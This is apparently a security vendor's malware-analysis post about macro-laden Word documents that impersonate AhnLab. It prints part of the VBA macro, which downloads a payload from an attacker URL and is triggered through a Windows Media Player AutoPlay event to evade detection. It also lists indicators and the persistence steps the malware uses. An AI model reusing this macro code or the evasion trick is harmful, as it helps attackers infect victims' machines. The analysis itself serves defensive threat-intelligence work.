Last week, the ASEC analysis team uploaded a post named “Malicious Word File Targeting Corporate Users Being Distributed” that contained information about a malicious Word file. Currently, documents of the same type are being distributed with text that impersonates AhnLab. The Word files confirmed this time download another Word file containing malicious VBA macro via the external URL and run it. Another difference is that the additionally downloaded Word file uses the Windows Media Player() function instead of AutoOpen() to automatically run the VBA macro. It appears the attackers adopted a measure to bypass anti-malware products that detect automatic execution of the AutoOpen() function-based macro.
The confirmed filenames are as follows:
– NFT split.docx
– 202203_BTC_ETH_additional account info.docx
– Complaint for fund-raising business without permission.docx
– Fund-raising without permission.docx
– BTC_ETH automated trading account info.docx
– Cryptocurrency_investment plan.docx
Upon running the Word file, a Word macro (dotm) file is downloaded via the external URL in the word\_rels\settings.xml.rels file and executed.
The downloaded file contains a macro as shown below. The attacker inserted an image and text to prompt users to press Enable Content.
When users click Enable Content, the malicious VBA macro that exists inside the externally-downloaded Word file is run.
The macro is written using the WindowsMediaPlayer1_OpenStateChange() function instead of AutoOpen() that was used in the previously detected Word documents. This function is executed when the openState property of the Windows Media Player object changes. When it is run, it performs malicious activities via the RunFE() function just like in previous cases. The following shows a part of the VBA macro code.
Private Function RunFE() As Long Dim MR As Object Dim bbb As String Dim i As Long Randomize Call Init For i = 0 To 8: bbb = bbb & Chr(Map1(Int(62 * Rnd()))): Next i Set MR = CreateObject(DecodeSTR("tw7v/v2UF6/h4I4v9cL5sgLww+yTE6+Dp9E=")) 'WinHttp.WinHttpRequest.5.1 Call MR.SetTimeouts(0, 2000, 2000, 5000) #If Win64 Then MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCv9RJ4NXk") & "?" & bbb & "=" & bbb 'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm #Else MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCutJJ4NXk") & "?" & bbb & "=" & bbb 'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm #End If <생략> Private Sub WindowsMediaPlayer1_OpenStateChange(ByVal NewState As Long) If bFlag = False Then Call CTD Dim rfRes As Long rfRes = RunFE() If rfRes = 1 Then bFlag = True End If End If End Sub
Opening the Word document downloaded through the external URL shows Windows Media Player within the file. The file contains Windows Media Player named WindowsMediaPlayer1 as shown below.
The attacker enabled the AutoPlay option for the Player so that the WindowsMediaPlayer1_OpenStateChange() function is automatically run. When the Player is run, WindowsMediaPlayer1_OpenStateChange() inside the VBA macro is executed, commencing malicious activities even if the user does not perform additional tasks for the Player. Ultimately, as the attacker set the Player to run automatically, the malicious macro is automatically run when the user clicks the Enable Content button.
Malicious activities that are performed by the macro code are the same as those explained in the previous blog post. It downloads additional malware that suits the user’s PC environment and runs it after injecting it into the Word process.
– X86 environment: hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
– X64 environment: hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm
Afterward, it drops USOService.exe into the %ProgramData%\USOShared\Logs folder and runs it. Then it adds the file as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WUService registry so that it can be continuously run.
The dotm file that was downloaded from the external URL of the additionally confirmed Word document ‘Complaint for fund-raising business without permission.docx’ creates the message box shown below if the macro is enabled. The Word file creates a malicious file named UpdateChecker.exe into the \AppData\Local\Microsoft\Office\ folder. It seems that the attacker drops malware in various folders including the %ProgramData% folder.
Attacks using Word files are being continuously discovered recently. As seen from the cases impersonating AhnLab to prompt users to enable macros, the attackers are using various images and content to trick people. One should take caution when enabling content for the file.
AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.